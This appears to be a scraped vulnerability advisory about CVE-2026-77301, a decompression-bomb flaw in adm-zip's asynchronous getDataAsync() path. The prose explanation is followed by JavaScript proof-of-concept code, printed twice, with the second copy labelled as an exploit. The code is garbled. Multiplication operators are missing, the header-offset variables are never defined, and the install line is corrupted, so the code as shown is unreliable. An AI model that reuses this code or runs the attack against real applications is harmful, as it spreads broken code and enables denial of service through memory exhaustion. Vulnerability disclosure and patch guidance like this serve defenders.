Listen to this Post
CVE-2026-77301 is a memory allocation vulnerability in the adm-zip library, a JavaScript implementation for ZIP archive handling in Node.js. The flaw resides in how the library processes ZIP entries when using the asynchronous decompression API. Specifically, adm-zip implements a decompression-bomb protection mechanism on its synchronous `getData()` path by passing a `maxOutputLength` option to Node’s zlib.inflateRawSync(). This option caps the amount of decompressed data that can be produced, preventing an attacker from crafting a ZIP entry that declares a tiny uncompressed size but actually contains a highly compressible payload that expands to a massive size. However, the equivalent asynchronous path, getDataAsync(), which uses the streaming API zlib.createInflateRaw(), does not enforce this limit. Although the same `maxOutputLength` option is passed to the streaming inflater, the library never checks the accumulated output size, nor does it abort the stream when the limit is exceeded. Instead, it simply collects every chunk emitted by the inflater and allocates a final buffer of whatever size resulted. This means that an application that first inspects an entry’s declared uncompressed size (e.g., to reject entries larger than a few kilobytes) and then reads the entry using `getDataAsync()` will receive the full decompressed payload, regardless of the declared size. An attacker can exploit this by creating a ZIP archive containing an entry that declares a small or zero uncompressed size but holds a DEFLATE-compressed bomb—a small compressed payload that expands to hundreds of megabytes or more. When the victim application processes this entry with the async API, the library allocates an enormous buffer, leading to memory exhaustion and a denial of service. The vulnerability is classified as CWE-789 (Memory Allocation with Excessive Size Value) and has a CVSS score of 8.7 (High). The issue affects adm-zip versions prior to 0.6.1 and is fixed in version 0.6.1.
DailyCVE Form:
Platform: adm-zip
Version: ≤ 0.6.0
Vulnerability: Memory Allocation
Severity: High
date: 19 Sept 2026
Prediction: Patch released
What Undercode Say:
npm install [email protected]
const AdmZip = require('adm-zip');
const zip = new AdmZip();
zip.addFile('p', Buffer.alloc(64 1024 1024, 0x41)); // 64 MiB
const raw = Buffer.from(zip.toBuffer());
// patch the local + central declared uncompressed size to 1 byte
raw.writeUInt32LE(1, localHeaderSizeOffset);
raw.writeUInt32LE(1, centralHeaderSizeOffset);
const entry = new AdmZip(raw).getEntry('p');
entry.getData();
// throws: ERR_BUFFER_TOO_LARGE: Cannot create a Buffer larger than 1 bytes
entry.getDataAsync((data, error) => { ... });
// returns the full 67,108,864-byte buffer, error is undefined
Exploit: (Educational Purposes!)
const AdmZip = require('adm-zip');
const zip = new AdmZip();
zip.addFile('p', Buffer.alloc(64 1024 1024, 0x41)); // 64 MiB
const raw = Buffer.from(zip.toBuffer());
// patch the local + central declared uncompressed size to 1 byte
raw.writeUInt32LE(1, localHeaderSizeOffset);
raw.writeUInt32LE(1, centralHeaderSizeOffset);
const entry = new AdmZip(raw).getEntry('p');
entry.getDataAsync((data, error) => {
console.log(data.length); // 67108864
});
Protection: Upgrade to adm-zip version 0.6.1 or higher.
Impact: An application that validates a declared size before reading an entry, then uses the async API, gets no protection against a high-ratio DEFLATE payload. Repeated or larger requests could contribute to memory exhaustion and cause a denial of service.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

